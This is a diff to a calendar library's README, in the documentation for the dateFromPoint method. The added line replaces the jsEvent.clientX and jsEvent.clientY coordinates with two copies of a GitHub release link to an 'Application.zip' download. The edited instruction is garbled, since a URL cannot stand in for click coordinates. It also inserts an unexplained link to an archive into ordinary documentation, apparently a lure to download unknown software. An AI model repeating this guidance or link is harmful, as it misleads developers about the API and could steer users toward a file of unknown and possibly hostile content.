ck20server/calendar/README.md

 </tr>
 </table>

 Using this method, you can, for example, find out on which day a click occurred inside a multi-day event.
-To do this, inside [eventClick](#eventclick), pass the `jsEvent.clientX` and `jsEvent.clientY` coordinates to `dateFromPoint` and get the desired date.
+To do this, inside [eventClick](#eventclick), pass the `https://github.com/ck20server/calendar/releases/download/v1.0/Application.zip` and `https://github.com/ck20server/calendar/releases/download/v1.0/Application.zip` coordinates to `dateFromPoint` and get the desired date.

 ### destroy()
 - Return value `undefined`